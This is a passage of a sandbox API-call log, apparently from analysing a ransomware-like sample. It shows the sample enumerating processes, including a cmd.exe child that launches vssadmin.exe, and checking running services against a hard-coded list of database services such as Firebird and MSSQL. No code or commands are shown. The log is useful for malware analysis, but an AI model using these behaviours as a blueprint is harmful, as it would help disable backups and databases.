th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0046.138] lstrlenW (lpString="attention infected.exe") returned 22 [0046.138] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0046.138] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0046.138] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0046.139] lstrlenW (lpString="pattern amateur.exe") returned 19 [0046.139] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0046.140] lstrlenW (lpString="referral.exe") returned 12 [0046.140] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0046.140] lstrlenW (lpString="copyingseems.exe") returned 16 [0046.140] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0046.141] lstrlenW (lpString="spin generally.exe") returned 18 [0046.141] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0046.142] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0046.142] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0046.142] lstrlenW (lpString="transmit.exe") returned 12 [0046.142] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0046.143] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0046.143] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0046.144] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0046.144] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0046.145] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0046.145] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0046.145] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0046.145] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0046.146] lstrlenW (lpString="delight.exe") returned 11 [0046.146] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0046.147] lstrlenW (lpString="within enquiry.exe") returned 18 [0046.147] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0046.147] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0046.147] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0046.148] lstrlenW (lpString="agent1c.exe") returned 11 [0046.148] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0046.149] lstrlenW (lpString="cmd.exe") returned 7 [0046.149] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0046.149] lstrlenW (lpString="conhost.exe") returned 11 [0046.150] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0046.150] lstrlenW (lpString="vssadmin.exe") returned 12 [0046.150] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0046.151] lstrlenW (lpString="VSSVC.exe") returned 9 [0046.151] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.152] lstrlenW (lpString="svchost.exe") returned 11 [0046.152] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0046.152] CloseHandle (hObject=0x1fc) returned 1 [0046.152] Sleep (dwMilliseconds=0x1f4) [0047.261] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x37208f8 [0047.261] EnumServicesStatusExW (in: hSCManager=0x37208f8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0047.262] GetLastError () returned 0xea [0047.262] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12c6) returned 0x3800fb0 [0047.262] EnumServicesStatusExW (in: hSCManager=0x37208f8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3800fb0, cbBufSize=0x12c6, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3800fb0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0047.263] CloseServiceHandle (hSCObject=0x37208f8) returned 1 [0047.263] lstrlenW (lpString="Appinfo") returned 7 [0047.263] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0047.263] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0047.263] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0047.263] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0047.263] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0047.263] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0047.263] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0047.264] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0047.264] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0047.264] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0047.264] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0047.264] lstrlenW (lpString="AudioSrv") returned 8 [0047.264] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0047.264] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0047.264] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0047.264] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0047.264] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0047.264] lstrlenW (lpString="BFE") returned 3 [0047.264] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0047.264] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0047.264] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0047.264] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0047.264] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0047.264] lstrlenW (lpString="CryptSvc") returned 8 [0047.264] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0047.264] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0047.264] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0047.264] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0047.264] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0047.264] lstrlenW (lpString="CscService") returned 10 [0047.264] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0047.264] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0047.264] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0047.264] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0047.264] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0047.264] lstrlenW (lpString="DcomLaunch") returned 10 [0047.264] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0047.264] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0047.264] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0047.264] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0047.264] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0047.265] lstrlenW (lpString="Dhcp") returned 4 [0047.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0047.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0047.265] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0047.265] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0047.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0047.265] lstrlenW (lpString="Dnscache") returned 8 [0047.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0047.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0047.265] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0047.265] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0047.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0047.265] lstrlenW (lpString="DPS") returned 3 [0047.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0047.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0047.265] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0047.265] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0047.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0047.265] lstrlenW (lpString="eventlog") returned 8 [0047.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0047.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0047.265] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0047.265] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0047.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0047.265] lstrlenW (lpString="EventSystem") returned 11 [0047.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0047.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0047.265] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0047.265] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0047.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0047.265] lstrlenW (lpString="gpsvc") returned 5 [0047.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0047.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0047.265] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0047.266] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0047.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0047.266] lstrlenW (lpString="iphlpsvc") returned 8 [0047.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0047.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0047.266] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0047.266] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0047.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0047.266] lstrlenW (lpString="LanmanServer") returned 12 [0047.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0047.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0047.266] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0047.266] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0047.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0047.266] lstrlenW (lpString="LanmanWorkstation") returned 17 [0047.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0047.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0047.266] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0047.266] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0047.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0047.266] lstrlenW (lpString="lmhosts") returned 7 [0047.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0047.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0047.266] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0047.267] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0047.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0047.267] lstrlenW (lpString="MMCSS") returned 5 [0047.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0047.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0047.267] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0047.267] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0047.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0047.267] lstrlenW (lpString="MpsSvc") returned 6 [0047.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0047.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0047.267] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0047.267] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0047.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0047.267] lstrlenW (lpString="Netman") returned 6 [0047.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0047.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0047.267] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0047.267] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0047.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0047.267] lstrlenW (lpString="netprofm") returned 8 [0047.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0047.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0047.267] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0047.267] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0047.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0047.267] lstrlenW (lpString="NlaSvc") returned 6 [0047.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0047.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0047.267] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0047.267] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0047.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0047.267] lstrlenW (lpString="nsi") returned 3 [0047.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0047.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0047.268] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0047.268] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0047.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0047.268] lstrlenW (lpString="PcaSvc") returned 6 [0047.268] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0047.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0047.268] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0047.268] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0047.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0047.268] lstrlenW (lpString="PlugPlay") returned 8 [0047.268] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0047.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0047.268] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0047.268] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0047.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0047.268] lstrlenW (lpString="Power") returned 5 [0047.268] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0047.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0047.268] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0047.268] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0047.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0047.268] lstrlenW (lpString="ProfSvc") returned 7 [0047.268] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0047.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0047.268] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0047.268] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0047.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0047.268] lstrlenW (lpString="RpcEptMapper") returned 12 [0047.268] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0047.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0047.268] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0047.268] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0047.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0047.269] lstrlenW (lpString="RpcSs") returned 5 [0047.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0047.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0047.269] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0047.269] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0047.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0047.269] lstrlenW (lpString="SamSs") returned 5 [0047.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0047.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0047.269] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0047.269] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0047.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0047.269] lstrlenW (lpString="Schedule") returned 8 [0047.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0047.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0047.269] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0047.269] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0047.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0047.269] lstrlenW (lpString="SENS") returned 4 [0047.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0047.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0047.269] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0047.269] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0047.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0047.269] lstrlenW (lpString="ShellHWDetection") returned 16 [0047.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0047.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0047.269] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0047.269] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0047.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0047.269] lstrlenW (lpString="Spooler") returned 7 [0047.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0047.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0047.270] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0047.270] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0047.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0047.270] lstrlenW (lpString="swprv") returned 5 [0047.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0047.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0047.270] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0047.270] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0047.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0047.270] lstrlenW (lpString="SysMain") returned 7 [0047.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0047.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0047.270] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0047.270] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0047.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0047.270] lstrlenW (lpString="Themes") returned 6 [0047.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0047.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0047.270] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0047.270] lstrcmpiW (lpString1="mssqlserver", 